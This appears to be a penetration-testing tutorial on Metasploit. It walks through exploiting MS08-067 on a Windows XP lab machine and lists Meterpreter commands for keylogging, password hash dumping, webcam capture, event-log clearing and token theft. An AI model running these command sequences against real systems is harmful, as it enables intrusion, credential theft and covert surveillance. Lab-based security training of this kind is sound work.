METASPLOITThe Metasploit Framework (Msf) is a free, open source penetration testing solution developed by the open source community and Rapid7. It covers the different techniques of information gathering and vulnerability scans using this tool. Metasploit eliminates the need for writing of individual exploits, thus saving considerable time and effort.
The terminologies used in the Metasploit
• Vulnerability
• Exploit
• Payload
Vulnerability:
A weakness in the target system through which penetration can successfully occur
Exploit:
Once the vulnerability is known, an attacker takes advantage of it, and breaks into the system using a code/script known as an exploit.
Payload:
This is a set of tasks initiated by attacker subsequent to an exploit, In order to maintain access to the compromised system.
NMAP:
The Nmap (network mapper) command can be used to perform service scans and information gathering using msf. Nmap has been able to extend its discovery capabilities beyond simply figuring out whether a host is up or down and which ports are open and closed. It also determines which type of operating systems and which version of listening service.
Metasploit Console:
The below command is used to scan and OS detection of target system
Msf>nmap 192.168.x.x –O
Here we r using Smb vulnerabilities. Smb is a server message block protocol.Smb is a protocol which is used to provide shared access to files, printers, serial ports between the computers in the network. This vulnerability in server service could allow remote code execution. "Arbitrary code", it typically means that the bad guy can run any command on the target system the attacker chooses. This could mean that the attacker triggers code already on the box, invoking a program or DLL by exploiting the vulnerability. Alternatively, the attacker could trigger the vulnerability to load his/her own code on the box and then run it. In a sense, these two operations are really pretty much the same thing. Either way, the attacker wins.
First Attack:
The next step in this Metasploit is to get into actual exploitations using Metasploit. Let us attempt to exploit a system on Windows XP with SMB vulnerability with an attacker system running Metasploit. The lab setup includes a Windows XP attacker system with Metasploit framework installed and a Windows XP vulnerable system, both on VMware.
The “info” command will provide you detail information about a particular module including all options, available targets and other information.
msf > info exploit/windows/smb/ms08_067_netapi
The “use” command is used to select the particular module.
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) >
msf exploit(ms08_067_netapi) >
The “set” command allows you to configure framework options and parameters for the current module you are working with. Here we are selecting Payload related to windows
msf exploit(ms08_067_netapi) > set payload windows/vncinject/bind_tcp
The “show options” command is used to display which settings are available or required for that specific module.
msf exploit(ms08_067_netapi) > show options
Here we are setting the target IP address
msf exploit(ms08_067_netapi) > set rhost 192.168.x.x
The “check” command is used to check if a target is vulnerable to a particular exploit instead of actually exploiting it but all the modules does not support the check command.
msf exploit(ms08_067_netapi) > check
Finally “exploit” command is used to exploit the target system
msf exploit(ms08_067_netapi) > exploit
Steps to be followed to attack the target system:
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/vncinject/bind_tcp
msf exploit(ms08_067_netapi) > set rhost 192.168.x.x
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > check
msf exploit(ms08_067_netapi) > exploit
Here we can view the desktop of the target system via VNC viewer. Now we can delete some files or modify the files of the target system.
Second Attack:
Here we are adding the extra user to the target system. Sometimes this attack can crash the target system
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/adduser
msf exploit(ms08_067_netapi) > set rhost 192.168.x.x
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > check
msf exploit(ms08_067_netapi) > exploit
Meterpreter
Meterpreter is a tool that is packaged together with the metasploit framework. Meterpreter has been developed within metasploit for making this task faster and easier. The meterpreter is an advanced multi-function payload that can be used to leverage our capabilities dynamically at run time when we are standing in a remote system and we do not have our tools out there.
The features of meterpreter are:
1. Does not create any files on the hard disk, it resides in memory and attaches itself to a process.
2. client-server communication between attacker machine and victim machine is encrypted
3. It provides a platform to write extensions.
Features of Meterpreter
With general payloads we are generally offered a shell through which we can have simple interaction with the system. Under these normal circumstances once the system is exploited a single payload is delivered that is only able to execute one command and then it is done. What if you want to download a file? Or you want to grab the password hashes of all user accounts? Or you want to pivot into other network? Or you want to escalate your privilege? Well, of course you can do these tasks but just imagine the number of steps and difficulties you will need to overcome while going on this way apart from this whenever a normal payload would allow you to pass a command and this command would do a single thing like adding a user, hiding something or opening a shell.
Meterpreter has 6 types of commands
1) Core Commands
Command Description
------- -----------
? Help menu
background Backgrounds the current session
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information about active channels
close Closes a channel
detach Detach the meterpreter session (for
http/https)
disable_unicode_encoding Disables encoding of unicode strings
enable_unicode_encoding Enables encoding of unicode strings
exit Terminate the meterpreter session
help Help menu
info Displays information about a Post module
interact Interacts with a channel
irb Drop into irb scripting mode
load Load one or more meterpreter
extensions
migrate Migrate the server to another
process
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post
module
use Deprecated alias for 'load'
write Writes data to a channel
2) Stdapi: File system Commands
Command Description
------- -----------
cat Read the contents of a file to the screen
cd Change directory
del Delete the specified file
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcd Change local working directory
lpwd Print local working directory
ls List files
mkdir Make directory
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
search Search for files
upload Upload a file or directory
3) Stdapi: Networking Commands
Command Description
------- -----------
ipconfig Display interfaces
portfwd Forward a local port to a remote service
route View and modify the routing table
4) Stdapi: System Commands
Command Description
------- -----------
clearev Clear the event log
drop_token Relinquishes any active impersonation token.
execute Execute a command
getpid Get the current process identifier
getprivs Attempt to enable all privileges available to the current
process
getuid Get the user that the server is running as
kill Terminate a process
ps List running processes
reboot Reboots the remote computer
reg Modify and interact with the remote registry
rev2self Calls RevertToSelf() on the remote machine
shell Drop into a system command shell
shutdown Shuts down the remote computer
steal_token Attempts to steal an impersonation token from the
target process
sysinfo Gets information about the remote system, such as OS
5) Stdapi: User interface Commands
Command Description
------- -----------
enumdesktops List all accessible desktops and window stations
getdesktop Get the current meterpreter desktop
idletime Returns the number of seconds the remote user has
been idle
keyscan_dump Dump the keystroke buffer
keyscan_start Start capturing keystrokes
keyscan_stop Stop capturing keystrokes
screenshot Grab a screenshot of the interactive desktop
setdesktop Change the meterpreters current desktop
uictl Control some of the user interface components
6) Stdapi: Webcam Commands
record_mic : Record audio from the default microphone for X seconds
webcam_list : List webcams
webcam_snap : Take a snapshot from the specified webcam
7) Priv: Elevate Commands
getsystem : Attempt to elevate your privilege to that of local system.
Priv: Password database Commands
Hashdump : Dumps the contents of the SAM database
9) Priv: Timestomp Commands
timestomp : Manipulate file MACE attributes
How to enter into meterpreter
msf>Set lhost 192.168.x.x
Msf>Set rhost 192.168.x.x
msf>use exploit/windows/smb/ms08_067_netapi
msf> set payload windows/meterpreter/bind_tcp
msf>exploit
Third Attack:
Capturing a screenshot
Screenshot command of meterpreter suite will export an image of what uset is doing on his desktop to our machine. Desktop screen can be used for gaining lot of information about the remote machine for example; you might to know about which antivirus is being used at remote machine etc
Meterpreter>screenshot
Then we can get screen shot of remote machine.
Fourth Attack:
Capturing keystrokes (snipping)
Using this we can grab what user types on the remote machine if we want to capture all data user is typing in explorer. By using this we can grab user name, password of an email account.
We can find out these details at following location
C:\Documents and Settings\Administrator\.msf4\logs\scripts\keylogrecorder\ notepad.txt
Meterpreter> run keylogrecorder
Like this we can do so many attacks…………..
meterpreter> run vnc
meterpreter>reboot
meterpreter>shutdown
meterpreter>getsystem
